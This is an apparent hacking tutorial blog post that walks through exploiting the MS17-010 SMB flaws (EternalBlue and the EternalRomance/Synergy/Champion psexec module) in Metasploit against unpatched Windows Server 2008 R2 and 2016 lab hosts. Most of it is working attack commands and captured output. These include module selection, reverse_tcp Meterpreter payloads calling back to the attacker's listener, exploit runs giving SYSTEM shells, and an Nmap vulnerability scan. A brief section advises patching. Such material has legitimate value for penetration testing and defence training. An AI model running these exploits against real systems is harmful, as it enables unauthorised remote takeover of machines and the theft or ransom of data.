How to Exploit EternalBlue on Windows Server with Metasploit

May 8, 2019 09:49 PM
May 11, 2019 12:05 AM
636894434873594801.jpg

Particular vulnerabilities and exploits come along and make headlines with their catchy names and impressive potential for damage. EternalBlue is one of those exploits. Originally tied to the NSA, this zero-day exploited a flaw in the SMB protocol, affecting many Windows machines and wreaking havoc everywhere. Here, we will use EternalBlue to exploit SMB via Metasploit.

What Is EternalBlue?

EternalBlue is an exploit most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which has possible ties to the Tailored Access Operations unit of the NSA.

EternalBlue, also known as MS17-010, is a vulnerability in Microsoft's Server Message Block (SMB) protocol. SMB allows systems to share access to files, printers, and other resources on the network. The vulnerability is allowed to occur because earlier versions of SMB contain a flaw that lets an attacker establish a null session connection via anonymous login. An attacker can then send malformed packets and ultimately execute arbitrary commands on the target.

EternalBlue was mostly responsible for the WannaCry, NotPetya, and BadRabbit ransomware outbreaks, as well as the EternalRocks worm.

Option 1: Exploit EternalBlue with Metasploit

We'll be using an unpatched copy of Windows Server 2008 R2 as the target for the first section of this tutorial. An evaluation copy can be downloaded from Microsoft so that you can better follow along.

Step 1: Find a Module to Use

The first thing we need to do is open up the terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not running already, followed by msfconsole.

service postgresql start
msfconsole

Next, use the search command within Metasploit to locate a suitable module to use.

search eternalblue
Matching Modules
================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010. It's always a good idea to perform the necessary recon like this. Otherwise, you could end up wasting a lot of time if the target isn't even vulnerable.

Once we have determined that our target is indeed vulnerable to EternalBlue, we can use the following exploit module from the search we just did.

use exploit/windows/smb/ms17_010_eternalblue

You'll know you're good if you see the "exploit(windows/smb/ms17_010_eternalblue)" prompt.

Step 2: Run the Module

We can take a look at the current settings with the options command.

options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

First, we need to specify the IP address of the target.

set rhosts 10.10.0.101
rhosts => 10.10.0.101

Next, we can load the trusty reverse_tcp shell as the payload.

set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

Finally, set the listening host to the IP address of our local machine.

set lhost 10.10.0.1
lhost => 10.10.0.1

And the listening port to a suitable number.

set lport 4321
lport => 4321

That should be everything, so the only thing left to do is launch the exploit. Use the run command to fire it off.

run
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.101:445 - Connecting to target for exploitation.
[+] 10.10.0.101:445 - Connection established for exploitation.
[+] 10.10.0.101:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.101:445 - CORE raw buffer dump (51 bytes)
[*] 10.10.0.101:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.10.0.101:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 10.10.0.101:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.10.0.101:445 - 0x00000030  6b 20 31                                         k 1
[+] 10.10.0.101:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.101:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.101:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.101:445 - Starting non-paged pool grooming
[+] 10.10.0.101:445 - Sending SMBv2 buffers
[+] 10.10.0.101:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.101:445 - Sending final SMBv2 buffers.
[*] 10.10.0.101:445 - Sending last fragment of exploit packet!
[*] 10.10.0.101:445 - Receiving response from exploit packet
[+] 10.10.0.101:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.101:445 - Sending egg to corrupted connection.
[*] 10.10.0.101:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.101
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.101:49207) at 2019-03-26 11:01:46 -0500
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

We see a few things happen here, like the SMB connection being established and the exploit packet being sent. At last, we see a "WIN" and a Meterpreter session is opened. Sometimes, this exploit will not complete successfully the first time, so if it doesn't just try again and it should go through.

Step 3: Verify the Target Is Compromised

We can verify we have compromised the target by running commands such as sysinfo to obtain operating system information.

sysinfo
Computer        : S02
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : DLAB
Logged On Users : 2
Meterpreter     : x64/windows

And getuid to get the current username.

getuid
Server username: NT AUTHORITY\SYSTEM

This exploit doesn't work very well on newer systems, and in some cases, it can crash the target machine. Next, we will explore a similar exploit that is a little more reliable, but just as deadly.

Option 2: EternalRomance / EternalSynergy / EternalChampion

As if EternalBlue wasn't devastating enough, three more similar exploits were developed after it. EternalRomance and EternalSynergy exploit a type of confusion (CVE-2017-0143), while EternalChampion and EternalSynergy exploit a race condition (CVE-2017-0146).

These were combined into a single Metasploit module that also uses the classic psexec payload. It's considered more reliable than EternalBlue, less likely to crash the target, and works on all recent unpatched versions of Windows, up to Server 2016 and Windows 10.

The only caveat is this exploit requires a named pipe. Named pipes provide a method for running processes to communicate with one another, usually appearing as a file for other processes to attach to. The Metasploit module automatically checks for named pipes, making it pretty straightforward to use as long as a named pipe is present on the target.

Step 1: Find a Vulnerable Target

We can use Nmap as an alternative to the Metasploit scanner to discover if a target is vulnerable to EternalBlue. The Nmap Scripting Engine is a powerful feature of the core tool that allows all kinds of scripts to run against a target.

Here, we'll be using the smb-vuln-ms17-010 script to check for the vulnerability. Our target will be an unpatched copy of Windows Server 2016 Datacenter edition. Evaluation copies can be downloaded from Microsoft so you can follow along if you want.

We can specify a single script to run with the --script option, along with the -v flag for verbosity and our target's IP address. First, change directories in case you're still running Metasploit.

cd
nmap --script smb-vuln-ms17-010 -v 10.10.0.100

Nmap will start running and shouldn't take too long since we are only running one script. At the bottom of the output, we'll find the results.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 11:05 CDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:05

...

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

NSE: Script Post-scanning.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds
           Raw packets sent: 1181 (51.948KB) | Rcvd: 1001 (40.060KB)

We can see it lists the target as vulnerable, along with additional information like risk factors and links to the CVE.

Step 2: Find a Module to Use

Now that we know the target is vulnerable, we can go back to Metasploit and search for an appropriate exploit.

msfconsole
search eternalromance
Matching Modules
================

   Name                                  Disclosure Date  Rank    Check  Description
   ----                                  ---------------  ----    -----  -----------
   auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

And load the module in Metasploit with the use command.

use exploit/windows/smb/ms17_010_psexec

You'll know you're good if you see the "exploit(windows/smb/ms17_010_psexec)" prompt.

Step 3: Run the Module

Let's take a look at our options:

options
Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

It looks like this exploit uses a list of named pipes to check and connects to a share. We can leave all this as default for now, but we need to set the remote host.

set rhosts 10.10.0.100
rhosts => 10.10.0.100

And the reverse shell payload.

set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

And our local host.

set lhost 10.10.0.1
lhost => 10.10.0.1

And local port.

set lport 4321
lport => 4321

We should be good to go now. Type run to launch the exploit.

run
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.0.100:445 - Built a write-what-where primitive...
[+] 10.10.0.100:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.0.100:445 - Selecting PowerShell target
[*] 10.10.0.100:445 - Executing the payload...
[+] 10.10.0.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes) to 10.10.0.100
[*] Meterpreter session 2 opened (10.10.0.1:4321 -> 10.10.0.100:49965) at 2019-03-26 11:12:30 -0500

We can see the payload successfully execute, and we end up with a Meterpreter session.

Step 4: Verify the Target Is Compromised

Again, we can verify we've compromised the system with commands like sysinfo.

sysinfo
Computer        : DC01
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : DLAB
Logged On Users : 4
Meterpreter     : x64/windows

And getuid.

getuid
Server username: NT AUTHORITY\SYSTEM

Prevention & Current Status

Despite all the damage EternalBlue has caused, there is one reliable way to prevent these types of exploits: patch your systems! At this point, nearly two years since these vulnerabilities were disclosed, there is really no excuse to have unpatched operating systems.

EternalBlue continues to be a problem, though, and even though the consequences are dire, unfortunately, some organizations will still be running unpatched systems. That, combined with pirated versions of Windows, makes EternalBlue a significant threat to this day.

Cryptojacking, which uses a victim's computer to secretly mine cryptocurrency, is another threat vector that uses EternalBlue to leverage attacks. WannaMine was one of these outbreaks that hijacked computers around the world in 2018.

Wrapping Up

Today, we learned about EternalBlue and how to exploit it using Metasploit. We also learned about an exploit similar to EB that is more reliable and works on more systems. In the next tutorial, we will dig a little deeper and learn how to exploit EternalBlue manually, which is much more satisfying in the end.

Cover image by Fancycrave/Pexels; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!